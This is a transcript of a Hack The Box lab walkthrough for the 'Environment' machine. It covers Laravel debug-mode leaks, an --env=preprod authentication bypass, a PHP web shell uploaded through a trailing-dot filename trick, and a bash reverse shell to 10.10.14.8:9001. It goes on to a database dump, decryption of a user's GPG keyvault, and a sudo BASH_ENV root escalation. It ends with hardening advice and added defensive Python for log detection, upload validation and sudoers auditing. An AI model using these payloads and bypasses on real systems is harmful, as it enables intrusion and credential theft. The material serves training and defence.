HackTheBox - Environment

IppSec · Beginner ·🔧 Backend Engineering ·9mo ago

Key Takeaways

The video demonstrates how to exploit vulnerabilities in a Laravel web application, including debug mode, authentication bypass, and file upload attacks, using tools like Nmap, GoBuster, and Burp Suite.

Full Transcript

What's going on YouTube? This is IppSec and we're doing Environment from Hack The Box, which starts off with exploiting two vulnerabilities within Laravel itself. Vulnerabilities in the underlying framework running websites are very dangerous because these packages are tied to custom code, so they aren't updated automatically. Additionally, companies are often hesitant to make these updates as it requires a lot more effort than just normal packages. Anyways, we discover debug mode is turned on, which lets us leak verbose information when we cause errors. If we cause an error on the login, we discover if we switch the app to preproduction mode, we can perform an authentication bypass. It also will show the Laravel version. So we can search CVEs, find an argument pollution vulnerability, which lets us switch the application to that preproduction mode and perform the authentication bypass. From here, there's a second vulnerability which lets us bypass upload restrictions and upload a PHP file to get a shell. After this, we decrypt a PGP-protected file and then exploit a sudo configuration to get root. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sC for default scripts, -sV enumerate versions, -vv for double verbose. This gives us things like the TTL. -oA output all formats, put it in the nmap directory and call it environment. And then the IP address of 10.10.11.67. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open. The first one being SSH on port 22. And the banner tells us it's a Debian box. We also have HTTP on port 80. Its banner tells us it's nginx and it's directing us over to environment.htb. So let's go ahead and add this to our hosts file. So we'll do sudo vi /etc/hosts. Then we can add 10.10.11.67 environment.htb. Save that. And let's go take a look at the page. So I'm going to do http://environment.htb. And it looks like my Burp Suite is on intercept.
So I'm just going to forward that. And we get the page. At the footer, we see Environment copyright 2025 and Production v1.1. I always like trying to identify what is running. So I'm going to look at the page source to see if anything's in the header that tells me like WordPress, Drupal, Joomla, things like that. I don't see anything. There is Wappalyzer. We can look at it. We have Tailwind, nginx, JavaScript. Doesn't really show us that much. We can run tools like Nuclei. So I started doing this a lot more just because it does give pretty good information. So I'm going to do environment.htb. Let this run. And then let's see what else could we do. We could look at 404 pages. So if I do like asd, we get this 404 Not Found. And this looks very much like a Laravel error message. I'm going to go to like 0xdf error message. And he has a cheat sheet, because this could also be, I want to say there's a JavaScript framework that kind of does a 404 pipe not found or something like that. But it's slightly different, I want to say. Is it here? I don't see anything. PHP-FPM. Looking at these screenshots, it is definitely going to look like Laravel. That's the only one with like a blue background. If we click it, we can see something like this. Maybe normalize 801. Let's see this. Yes, it does match. So this is definitely going to be Laravel. There's other ways you could flag that as well. I'm sure if we look at like the cookies. So let's go over to Storage. We can see there is a laravel_session, which is the default name, and this XSRF-TOKEN. I want to say if it was like Django, the default is csrf. Just small nuances that can easily kind of tell what's going on. So we know this is a Laravel page. We have a join our mailing list. So I'm just going to see if this functionality works. We do root@ippsec.rocks, email added. And I'm going to be curious if it uses like the API or anything. So let's send this join. Send it over.
Where are we making this request to? Just /mailing. Looking at these headers, I don't think this is going to any type of built-in Laravel API. We have a token here. If we didn't send this token, we just get the page expired. That is expected. If we hit this page with no email, it just directs us back. So nothing too interesting, right? I'm going to run a GoBuster. So we can do gobuster dir -u http://environment.htb, wordlist. I need to spell that correctly. What is it? /opt/SecLists/Discovery/Web-Content/raft-small-words.txt. Run that. And we're getting a lot of just 403s. So I want to add this to my blocklist. So I'm going to do -b. I'm going to say 403,404. So this means it's going to hide any status code of 403 and 404 from us, which just makes it a little bit easier. We see /upload goes to a 405. And this size is pretty big, right? So let's go take a look at what a 405 page looks like. I'm just going to go /upload. And I probably should turn my Burp Suite off. We get a Method Not Allowed. And this is in debug mode because we can see a lot of information. We see Laravel version 11.30.0. And we kind of see what the page looks like, or data here. So this does start giving us access to the source code, but I don't think we saw anything really that interesting, right? We could dig through all the frames, but first we see what version of Laravel is running. If we do Laravel release notes, maybe this will have like the dates and everything. We can see how old this is. Let's see. Laravel 11.x. This looks good. 1113. We don't see anything here. Let's just go to CVE Details. I'm sure if we did more research around changelogs, release notes, we could find exactly when this version came out, but I really don't care that much about it. I just want to know like CVEs against Laravel. So looking at this, I'm going to click on vulnerabilities and we can see quite a few, right? Let's see.
Full-stack framework in Livewire version three. I don't know if this server is using Livewire. I'm assuming it's unauthenticated because it's 9.8. But I'm going to move on from that. I also think this box was published probably right around this time. So it's possible this CVE is interesting. Let's see. Laravel is a web framework. When using wildcard validation on a given file or image field (files.*), a user-crafted request could bypass validation rules. I don't see any like file upload. I haven't seen any fields with file. So I'm going to ignore this one for now. Laravel Pulse. I don't know exactly what that is. Monitoring tool. Let's see. Laravel's web application framework. When the register_argc_argv directive is set on, any user can call a URL with a specially crafted query string and change the environment used by Laravel handling the request. So this kind of sounds interesting. Let's see how to do this. I'm just going to Google GitHub PoC and see if anything comes up. We have this CVE. Let's see. Does it tell us exactly how to use it? Waiting for the page to load. It's talking about it. PoC example. So it changes to local. Okay. So we do question mark as a parameter, --env is equal to something. So let's go ahead and see if this works. So chances are the environment is production. I would guess it's kind of development because it's in debug mode. It's very odd to see a production web app with debug mode turned on to get that verbose error message, but let's try this. I'm going to do ?--env. And we'll say dev. That's a common one, right? And we see it is reflected here. My first thought is, is it weird where we can actually execute system code? So we can do please subscribe like this. I really don't think this would work, but something we kind of test, right? It is going to be URL-encoding all these. So it doesn't look like we have a way to do that. And we also can't really do cross-site scripting. That is good to know, right?
I don't really see any other pages. Let's go back to our GoBuster. We have a /login, /upload, /errors. /mailing is a 405. We got /up. So let's check /up and /login. I'm really curious what /up is. If we just go /up, application's up. I don't know what I expected. We got a login endpoint. So we have username, password. So we can do something here and see if this goes to like an API and see what this login request looks like. Right? It's just making a POST to /login. So I don't think it's using the internal Laravel API. If we forward this request, let's see, invalid credentials. We could identify like potential SQL injection. So I'm going to cause an error message in this and see what happens, right? Because we can potentially see source code if we cause error messages. So normally in PHP, we notice this a lot in like reverse shell scripts when you just do like system($_REQUEST['cmd']). If you don't specify the cmd, it errors telling you we need cmd parameters. So I'm just going to get rid of, I guess, the email parameter. And we'll forward this along, and there we go. It's trying to get the email parameter and it can't. So that's why we error here. And looking at this, we do a POST to login. Let's see. I don't see exactly where it's sending the email and password. So I can't tell if it's using like prepared queries, the Laravel syntax, how it's actually doing login. This syntax is really odd, right? We have this: if remember is equal to false, then keep logged in is false, else it's true. Keep logged in to true, and then we set it to false here. I don't see this variable initialized as keep logged in. Right? So if I have remember and I set it to something that's not true or false, then it won't be initialized and we'll error here, so we can see more of the code down below. So that's my logic and what I'm going to do next. Right? So let's try this again. We'll do this, turn intercept on, forward it along, and let's say remember is equal to please subscribe.
It just doesn't have to be true or false, right? We could probably just, if we didn't set it at all, it would probably error when it's trying to grab this variable, right? So we have to set it to something, it just can't be true or false, I believe. Go here, and now we error on line 75, which is much lower, and we can see more of the code, right? So now we see this: if app environment is preprod, then it's automatically going to just log in with the very first user ID. And here it's using the correct syntax to pull the user. I'm guessing the next line down will be like user.password is equal to something. So it's not vulnerable to SQL injection, but it is going to be vulnerable to authentication bypass. So we just have to set the environment to preprod. So let's go ahead and go back to the login. Do this once more with feeling. Click this, go in, and let's see, POST to login. And I'm going to specify --env is equal to preprod. And this should trigger that one piece of code that's just going to automatically put the user ID one into our session. So forward this, send it, and we get logged in. So we have the dashboard, the profile, and logout. We could also change this. So we can do --env is equal to preprod to see if there's any hidden features. And we do get a PHP info page. So I'm going to go click that. It looks like the link goes away. So that's a bit annoying. Let's see. This goes to management. So I can do info with --env=preprod like that. And there we go. We have a PHP info page. Now this doesn't actually buy us anything. But the first thing I do is just search for passwords, because this is going to export like the environment, right? So I'm looking for like MySQL passwords, right? As passwords, things like that. Let's see. SQLite. Do we have where it's loading? I'm trying to find out like, do we know this application is SQLite or not? But I didn't see any passwords in this PHP info page. So nothing too interesting.
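The environment override used above only works because the request can pick the Laravel environment, and debug mode then shows which code path that environment enables. Two defender-side checks for that, as an added example that is not code from the video, from Laravel or from nginx: a parser that flags nginx access-log requests whose query string carries a CLI-style key such as `--env` (the CVE-2024-52301 indicator), and a php.ini check for `register_argc_argv`, the directive the advisory names as the precondition. The log lines are constructed, the combined log format is assumed, and treating any `--`-prefixed query key as suspicious is my own rule.

```python
"""Added example, not code from the video or from Laravel/nginx.

Two defender-side checks for the environment-override issue (CVE-2024-52301):
a parser that flags nginx access-log requests whose query string carries a
CLI-style "--" key such as "--env", and a php.ini check for register_argc_argv,
the setting that makes PHP expose the query string as argv. Assumptions of
mine: nginx "combined" log format, and that any "--" prefixed query key is
worth flagging."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (nginx combined format); IPs, paths and sizes are made up.
SAMPLE_LOG = """\
10.10.14.8 - - [27/Apr/2025:10:01:02 +0000] "GET /login?--env=dev HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.8 - - [27/Apr/2025:10:01:09 +0000] "POST /login?--env=preprod HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.8 - - [27/Apr/2025:10:01:20 +0000] "GET /management/info?%2D%2Denv=preprod HTTP/1.1" 200 80000 "-" "Mozilla/5.0"
10.10.14.9 - - [27/Apr/2025:10:02:00 +0000] "GET /upload HTTP/1.1" 405 300000 "-" "curl/8.5"
10.10.14.10 - - [27/Apr/2025:10:03:00 +0000] "GET /?page=2 HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
"""

# nginx "combined" format: ip ident user [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def cli_style_keys(target: str) -> list:
    """Query-string keys that start with "--", percent-decoded, in request order."""
    keys = []
    for key, _value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key.startswith("--"):      # parse_qsl already decodes %2D%2D to --
            keys.append(key)
    return keys


def find_env_override_requests(log_text: str) -> list:
    """Parse combined-format lines and return the requests carrying a "--" key."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                  # skip lines that are not in combined format
        keys = cli_style_keys(m["target"])
        if keys:
            hits.append({"ip": m["ip"], "method": m["method"],
                         "path": urlsplit(m["target"]).path,
                         "status": int(m["status"]), "keys": keys})
    return hits


# Matches an active (not ';'-commented) register_argc_argv line in php.ini.
INI_RE = re.compile(r'^\s*register_argc_argv\s*=\s*([^\s;]+)', re.MULTILINE)


def register_argc_argv_enabled(ini_text: str) -> bool:
    """True if php.ini sets register_argc_argv to an "on" value; the last
    assignment wins, and a missing directive counts as not explicitly enabled."""
    values = [v.strip('"\'').lower() for v in INI_RE.findall(ini_text)]
    return bool(values) and values[-1] in {"on", "1", "true", "yes"}


if __name__ == "__main__":
    for hit in find_env_override_requests(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['path']} -> {hit['status']} keys={hit['keys']}")
    print("register_argc_argv on:", register_argc_argv_enabled("register_argc_argv = On\n"))
```

Run it against a real `access.log` by passing the file contents to `find_env_override_requests`; the percent-encoded third line shows why the check must run on the decoded key rather than on the raw request line.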
This is not clickable, so we can't really do anything here. If we go to profile, we can choose a new picture and upload it. So, traditional PHP: whenever you can upload files, it's very, very dangerous, because if you upload a PHP script, you can get code execution. So let's go ahead and try that. And I just realized I never talked about what Nuclei found. So I guess we can go over this real quick. Let's see. It found Laravel there. CSRF token. Oddly enough, it checks SSH. Let's see. So I guess it's doing like a port scan. I thought it was just web, but it does a little bit more. I guess the most interesting to me is tech-detect to Laravel, and it finds it there. But nothing too interesting here from Nuclei. So now let's go ahead and copy this image here just in case we need it. I'm also going to do vi shell.php. And let's see, I want to do a system($_REQUEST['cmd']). And I know I have a typo there. I will fix that momentarily. There we go. Save that. So now let's go ahead and try an upload. So let's see. Proxy intercept on. Let's upload. Choose a new picture. Let's go to http://environment. And then first I'm just going to upload shell.php. Upload. Send it over to Repeater. And let's see if we just send this. We have invalid error detected. And I'm just going to auto-scroll here to make it easier. And let's see. I'm going to change this to be image/gif. Send it, invalid file. Let's see. We can do shell.gif. Still invalid file. Let's change the magic bytes. I want to say it's like GIF89a. Like if that's the beginning of a file, I want to say it detects it as GIF. And it uploaded. So let's try shell.gif.php, and we get invalid file detected. So let's see, what can we do here? We don't have any like include options. So we can't do like a file inclusion. And if we just try to access this URL, already exists. Let's do shell1. Let's see, environment.htb goes in storage/files/shell.gif.
If we just try to access this, let's see what happens. Get rid of those backslashes. It contains errors. ?sleep=1. It comes back immediately. So we know it's not executing code because we don't have the PHP extension. And it looks like it is kind of filtering for that, right? We could try like .php5. .php5 looks like it uploaded. Let's see. Does this actually execute with .php5? I doubt it because it's nginx. Apache is very like loose with how it executes. Normally in nginx, you have the like location header or whatever it is in the code. Specify only .php gets passed through. It is in Repeater. If we send this, what happens? It just echoes everything back. So .php5 does not work. But what is interesting about this is it allowed it, right? It doesn't allow us doing .php, but it allows .php5. So what that tells me is there's a like blacklist around what extensions we can upload, right? And if we think back looking at the CVEs, we went back to Laravel, right? There was one that said, what is it? Image validation. A user-crafted malicious request could bypass validation rules. So I'm going to turn intercept off. Let's click this. Does it tell us any more? Let's go to the advisory. We may have to just search the CVE for a PoC. That gives us no details. The commit. Is this going to tell us anything? If not, then we can just search for this CVE and it should come up pretty quickly, right? This does a lot more things than just one thing. So it's probably going to be quicker just to search GitHub PoC, go to Google, advisory, wiz.io. This normally has actual PoCs. See impact, let's see, the issue, bypass validation rules. Does not say how to bypass, though. Let's see, here's an actual PoC. 271. This is a different CVE, 52 not 55. Let's see, let's just try searching the CVE and see if we get a like write-up or something like that. This looks like a blog post. MIGO Security. Let's see.
When using wildcard, that's what we saw. Let's see. Replace instance placeholder with static placeholder hash across validator. So it looks like maybe some type of validator is removing characters at the end. So like a dot and a star gets removed. So I'm guessing, like, let's try this real quick. If I do .php*, page expired, so we have to go back and get a fresh cookie. We have to log in, I guess. root@ippsec.rocks, password. I'm guessing it like trims the end of a URL and that's how this vulnerability comes into play. So send this, we need to do --env is equal to preprod, forward along, profile, intercept on, choose picture, upload, and let's see, I just replace this with what I have before. Not that one. This one. There we go. Send it along. And it looks like it uploaded. I wonder if it wrote to just .php. Let's copy. Where is the page? We actually can go here. It would be shell, file not found. Let's try adding a dot on the end. Send this. And there we go. The dot is not apparent here. We just wrote to shell1.php. So it looks like it's trimming the end period. So if I now go back to this one, we don't have that PHP string, which means if we change this to a POST request, we can say cmd is equal to id. And there we go. Code execution. So let's do a bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1' like that. Let's make sure this is all URL-encoded. Then nc -lvnp 9001, send, and we get a shell. Awesome. So let's create the proper TTY. python3 -c 'import pty; pty.spawn("/bin/bash")', then stty raw -echo; fg, enter, and let's see, we can also fix our rows. So rows 26 columns 121; stty rows 26 columns 121, and then export TERM=xterm. And now we can clear the screen. Awesome. So the first thing I always like doing on web servers is dumping the database. So let's see if we can find where it's at. I'm in app storage. Let's see. find, grep sql. Do we just have a database? There is a databases directory. sqlite3 databases. Awesome. .dump. And we have users. Awesome.
So that's the mailing list. Cooper, Bob, Xander. Nothing too interesting there. Let's see. Sessions. There we go. And we have some passwords. So let's see. This is going to be the users table. We can do email and password. So select email, password from users. And we have a list of things. And I don't think cracking this actually gets us anything. So I'm not going to do it. But I still wanted to show the process, right? Because if we were on this box... Let's exit out of SQLite. I did Ctrl-D and we went to /home. We discover hish is, anyone can go into this directory, right? And we can get user.txt here. And we also see a backup directory. And the backup directory does have stuff. So we can see there is a keyvault.gpg. So if we try to like gpg -d keyvault like this, we can't create the directory /var/www/.gnupg. If we look, there is a .gnupg directory in hish. If I can type, and this has the keyring, right? And if there's a password here, we'll have to do like hashcat or john to crack it, but we can see if there is a password. So what I'm going to do is just cp -r this directory over to /dev/shm, and then I'm going to do a gpg, I think it's --home /dev/shm like this, and then we would try to specify the keyvault. Let's see, error creating backup keyvault. See, is it gpg -h | grep home? It's probably --home-dir. There we go. What are the options? I know there's a way to specify home. Maybe it was in the man page or something. Let's see. Maybe it's --homedir. Okay, that is progress. So let's do --homedir /home/hish/backup/keyvault. Let's see, error creating this directory. Let's see and do export. So right now, if I do echo $HOME, it thinks my home is /var/www. So I'm going to export HOME=/home/hish and change that. So now it thinks my home directory is that. And now let's try running this. And the easiest thing to do is probably to back up this .gnupg directory, copy these locally, and then just run it on your local box, right?
But I want to try getting it this way. Let's see. Error creating. Oh, I don't have a -d. There we go. Let's do export HOME=/var/www. Did I even need to change my home directory? Was this just me forgetting the -d? It was. So if you just specify the home dir where the .gnupg file is, you don't have to copy that back. Just don't forget the -d to decrypt, right? And we have PayPal, environment.htb, and facebook.com. Now, this is probably going to be the password for the user hish, right? Because that's where we have the backup. So I'm just going to try ssh hish@environment.htb, paste in that password, and we get logged in. Now, we already saw the home directory, right? That's not too important. If I do a sudo -l, put the password in, we can see the sudo. And this is interesting. Whenever I see env_keep, that is interesting to me, right? We're keeping ENV and BASH_ENV, and we're able to execute /usr/bin/systeminfo. So let's see what this file is. It is a bash script. I just do ls. We can see it's just going to display a bunch of things. So we can just quickly execute this. If we did sudo this, that's what it does, right? But looking at it, it's not doing... Hold on. sudo -l. Let's see. Okay. I was thinking we could set like the, what is it? Not the home directory. I am blanking on the name. The PATH. I was thinking we could just have the PATH set and it would keep it, but we could only keep two variables, ENV. So I'm going to Google what BASH_ENV is. So let's go here. I have to turn my proxy off. Let's see. BASH_ENV: when bash executes a script, then expanded, the name of the... So it's the bash startup file. So all I have to do is create a startup file. So we can do /dev/shm/parent.sh is what I'll call it, #!/bin/bash. And let's say this is just going to execute bash. We probably want to make this executable. And now we can go back to where we executed this.
And I can say sudo BASH_ENV=/dev/shm/parent.sh. So what this is going to do is it's going to execute this script as my like bash init. And what it does, it's just going to drop me into a shell. There we go. Awesome. And that is going to be the root. So we can do that. And we can get root.txt. And yeah, that is the box. So, hope you enjoyed it. Take care. And, actually, real quick, if we want to talk about hardening the box, since we did this pretty quickly, we can show this real quick. If we just hit /upload, right? That's where we get this error message. And this is very bad whenever it's in production. So I bet if we went to /var/www, let's go app maybe. Is there .env? Let's see. There we go. We got this APP_DEBUG. So if we just change this to false. Let's see. service php-fpm restart. Does that work? Oh, shoot. How do I restart this? Fine. PHP. systemctl restart php8.2-fpm. That looks promising. It's taking some time. I wonder if it can't restart because I have a shell open and that's what it's hanging on, right? I'm just going to exit this real quick. And that may speed things up. Soon as I did that, you saw this finish, right? So just waiting to stop that process. So now when I do it, we just get the server returned a 405 Method Not Allowed, right? It's not giving you that Laravel debug output, which is helpful for developers, very helpful for attackers. So you always want to have that, right? You could have a second way to do this, I want to say. Let's see, /var/www/app. Let's see. .env. So if we didn't have this, so let's set this back to true, and then systemctl restart php8.2-fpm. So there we go. We're back there. I think it's like nginx sites. Yeah, enabled. We could probably muck around with this. So let's see. nginx PHP-FPM intercept errors. I want to say this is going to get me to the page. I've never really done this with PHP-FPM, but I assume it is possible.
fastcgi_intercept_errors on. Okay. And this stanza, this is why we can't do .php5, right? This is just saying anything that ends in .php, send it to PHP-FPM, which executes the PHP script, since it has the .php and then end of string. That's why .php5, 6, 7, whatnot don't work, right? So let's do systemctl restart nginx. Does that alone fix this? We probably have to like say where the error goes. Okay, that did not do it alone. Let's see. I want to... I don't think this is going to be right, but I'm curious. No. So how do we do this? Oh, wait. The error message wasn't 403. I want to say it was 405. We go back. I think this is where I ran GoBuster. 403. Let's see. Upload. Damn it. Upload. There we go. Yeah, the status code is 405. So let's go ahead and do this. 405. Save it. Restart. Refresh. And there we go. So now nginx, whenever it sees that 405 status code, it's just going to give us a Not Allowed. So there's two different ways we could have blocked that verbose error message from reaching the user. The recommended way, definitely not run the application in debug mode, because some frameworks may do additional things, right? There is like an Xdebug header in PHP that we saw, I think, in like the Olympus machine years ago, that when it's set you can just run PHP based upon the header. Laravel doesn't allow that, but you never know exactly what your framework's allowing by being in debug mode, right? So always best to not run the framework in debug mode, and then you could double-check it by just having your nginx hide specific error messages. So with that being said, that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next
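The upload bypass in the video comes down to ordering: the extension deny-list runs against the raw filename, and the trailing dot is trimmed only afterwards, so `shell1.php.` has an empty extension when it is checked and is stored as `shell1.php`. The following is an added example, not code from the video, the box or Laravel, that puts that failing order next to a check that normalises first, allow-lists the extension, matches the declared extension against the file's magic bytes and never reuses the client's filename. The deny-list contents, the allow-list, the function names and the sample uploads are my own constructions.

```python
"""Added example, not code from the video, the box, or Laravel.

Shows the upload failure mode the video finds (an extension deny-list applied
to the raw filename, with trailing dots trimmed only afterwards, so
"shell1.php." slips through and is stored as "shell1.php") next to a check
that normalises first, allow-lists the extension, matches magic bytes to the
extension and discards the user-supplied name. Rule sets, function names and
the sample uploads are my own constructions."""
import secrets

DENY_LIST = {"php", "phtml", "phar"}                    # the kind of list the video infers
ALLOWED = {                                             # extension -> accepted magic bytes
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}


def extension_of(name: str) -> str:
    """Text after the last dot, lower-cased; empty if the name has no dot."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def looks_like_image(data: bytes) -> bool:
    """Loose sniff: does the body start with any known image magic?"""
    return any(data.startswith(m) for magics in ALLOWED.values() for m in magics)


def naive_upload_name(filename: str, data: bytes):
    """Deny-list on the raw name, magic-byte sniff, THEN trim trailing dots.
    "shell1.php." has an empty extension here, so it passes and becomes shell1.php.
    Returns the stored name, or None when rejected."""
    if extension_of(filename) in DENY_LIST or not looks_like_image(data):
        return None
    return filename.rstrip(". ")            # the late trim that turns "x.php." into "x.php"


def hardened_upload_name(filename: str, data: bytes):
    """Normalise first, then allow-list; the stored name never comes from the user."""
    base = filename.strip().rstrip(". ").replace("\\", "/").rsplit("/", 1)[-1]
    ext = extension_of(base)
    if ext not in ALLOWED:                  # .php, .php5, .gif.php all fail here
        return None
    if base.count(".") != 1:                # exactly one dot: no double extensions
        return None
    if not any(data.startswith(m) for m in ALLOWED[ext]):
        return None                         # declared extension must match the bytes
    return f"{secrets.token_hex(8)}.{ext}"  # random server-side name, safe extension


# Constructed uploads: (client filename, first bytes of the body).
CASES = [
    ("shell.php",     b"<?php echo 1;"),
    ("shell.gif",     b"GIF89a" + b"<?php echo 1;"),
    ("shell.php5",    b"GIF89a" + b"<?php echo 1;"),
    ("shell.gif.php", b"GIF89a" + b"<?php echo 1;"),
    ("shell1.php.",   b"GIF89a" + b"<?php echo 1;"),
]


def evaluate_cases() -> dict:
    """Map each sample filename to (naive result, hardened result)."""
    return {name: (naive_upload_name(name, data), hardened_upload_name(name, data))
            for name, data in CASES}


if __name__ == "__main__":
    for name, (naive, hardened) in evaluate_cases().items():
        print(f"{name:15} naive={naive!r:15} hardened={hardened!r}")
```

The `.php5` row is the one to watch: the deny-list lets it through, and it was only the nginx `\.php$` location block that kept it from executing, which is the kind of second layer the video's nginx discussion is about. An allow-list removes the dependence on that layer.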
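The privilege escalation relied on one sudoers setting: `env_keep` preserving `BASH_ENV` (and `ENV`) for a rule that runs a bash script, so the caller chooses a file bash sources before the permitted script runs. Here is an added example, mine and not from the video, that parses sudoers text in visudo syntax and reports every rule exposed by such a kept variable; the sample sudoers file is constructed (the box's real file is not shown in the video), and the parser handles only the simple `Defaults` and `user host=(runas) commands` forms it needs.

```python
"""Added example, not from the video: audit sudoers text for env_keep entries
that preserve shell start-up variables. BASH_ENV names a file bash sources
before running any non-interactive script; ENV is the equivalent for sh.
The sudoers sample is constructed in visudo syntax, and the parser covers only
the simple "Defaults" and "user host=(runas) commands" lines it needs."""
import re

DANGEROUS_ENV_KEEP = {"BASH_ENV", "ENV"}

# Constructed sample: env_reset is on, but env_keep adds the two variables back.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "ENV BASH_ENV"
root    ALL=(ALL:ALL) ALL
hish    ALL=(ALL) /usr/bin/systeminfo
"""

# The same file with the env_keep line removed: the fix the video implies.
FIXED_SUDOERS = "\n".join(l for l in SAMPLE_SUDOERS.splitlines() if "env_keep" not in l) + "\n"

ENV_KEEP_RE = re.compile(r'\benv_keep\s*(\+=|-=|=)\s*"?([^"]*)"?')
RULE_RE = re.compile(r'^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\))?\s*(.+)$')


def parse_sudoers(text: str):
    """Return (variables kept by env_keep, list of user rules)."""
    kept, rules = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and #include lines
        if not line:
            continue
        if line.startswith("Defaults"):
            m = ENV_KEEP_RE.search(line)
            if m:
                op, names = m.group(1), m.group(2).split()
                if op == "=":
                    kept = list(names)
                elif op == "+=":
                    kept.extend(names)
                else:                              # "-=" removes names
                    kept = [v for v in kept if v not in names]
            continue
        m = RULE_RE.match(line)
        if m:
            user, _host, runas, cmds = m.groups()
            rules.append({"user": user, "runas": runas or "root",
                          "commands": [c.strip() for c in cmds.split(",")]})
    return kept, rules


def audit(text: str) -> list:
    """One finding per (dangerous kept variable, rule). Any permitted command
    that is a shell script, or that starts a shell, sources the caller's file."""
    kept, rules = parse_sudoers(text)
    findings = []
    for var in sorted(DANGEROUS_ENV_KEEP.intersection(kept)):
        for rule in rules:
            findings.append(
                f"env_keep preserves {var}: {rule['user']} may run "
                f"{', '.join(rule['commands'])} as {rule['runas']} with a caller-chosen {var}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS):
        print(finding)
    print("after fix:", audit(FIXED_SUDOERS) or "no findings")
```

Point it at the output of `sudo cat /etc/sudoers` plus the files under `/etc/sudoers.d`; the audit cannot tell from sudoers alone whether a permitted command is a shell script, so each finding is a rule to inspect, and the fix is to stop keeping the variable rather than to audit the scripts.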

Original Description

00:00 - Introduction
01:00 - Start of nmap
02:30 - Discovering that Laravel is running based upon 404 page (or cookie)
04:40 - Running GoBuster, adding 403 to the ignore list of codes and discovering /upload
05:40 - Laravel running in DEBUG mode, so the error page gives verbose info. Searching for CVEs for Laravel 11.30.0
07:55 - CVE-2024-52301, changing the Laravel environment with argument pollution
09:30 - Discovering we can bypass auth by setting environment to preprod
14:30 - Exploiting another Laravel CVE-2025-27515 to bypass the extension blacklist
22:45 - Got a shell on the box, dumping database
24:00 - Discovering a GPG Encrypted file, using keys on the box to decrypt it
27:30 - Sudo lets us keep the environment BASH_ENV which lets us set the bash environment to a script and privesc
30:00 - Beyond root, showing disabling debug mode on application and nginx config


This video teaches how to exploit vulnerabilities in a Laravel web application, including debug mode, authentication bypass, and file upload attacks, using various tools like Nmap, GoBuster, and Burp Suite. The viewer will learn how to identify and exploit vulnerabilities, and understand the importance of security in web applications.

Key Takeaways
  1. Run Nmap to scan for open ports
  2. Use GoBuster to discover directories and files
  3. Exploit debug mode to gather information
  4. Use Burp Suite to test for authentication bypass
  5. Upload a malicious file to gain access to the system
💡 The video highlights the importance of security in web applications and demonstrates how to exploit vulnerabilities using various tools.
